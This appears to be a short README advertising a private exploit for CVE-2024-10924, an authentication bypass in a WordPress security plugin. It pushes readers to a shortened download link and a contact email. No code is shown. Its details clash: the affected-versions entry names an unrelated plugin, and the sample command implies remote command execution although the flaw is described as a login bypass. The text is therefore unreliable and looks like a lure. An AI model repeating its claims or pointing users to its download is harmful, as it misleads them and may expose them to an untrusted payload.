CVE-2024-10924 Authentication Bypass Using an Alternate Path or Channel (CWE-288)# CVE-2024-10924 Authentication Bypass Using an Alternate Path or Channel (CWE-288)
## Overview
The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This vulnerability is caused by improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. It affects installations where the "Two-Factor Authentication" setting is enabled, which is disabled by default.
## Exploit:
## [Download here](https://bit.ly/4ezeMHe)
## Details
+ **CVE ID**: CVE-2024-10924
+ **Published**: 11/16/2024
+ **Impact**: Unconfidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability allows unauthenticated attackers to log in as any existing user on the site, including administrators. The potential impact is severe, as it could lead to complete compromise of the WordPress site. An attacker could gain full administrative access, potentially allowing them to modify content, install malicious plugins, access sensitive information, or use the compromised site for further attacks.
## Affected Versions
AJAX Random Posts<= 0.3.3
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact: brahmanskiy@outlook.com**
+ [Download here](https://bit.ly/4ezeMHe)
[4.0K] /data/pocs/0938d81ab5b378ae61dad529803021615b0ced35
└── [1.4K] README.md
0 directories, 1 file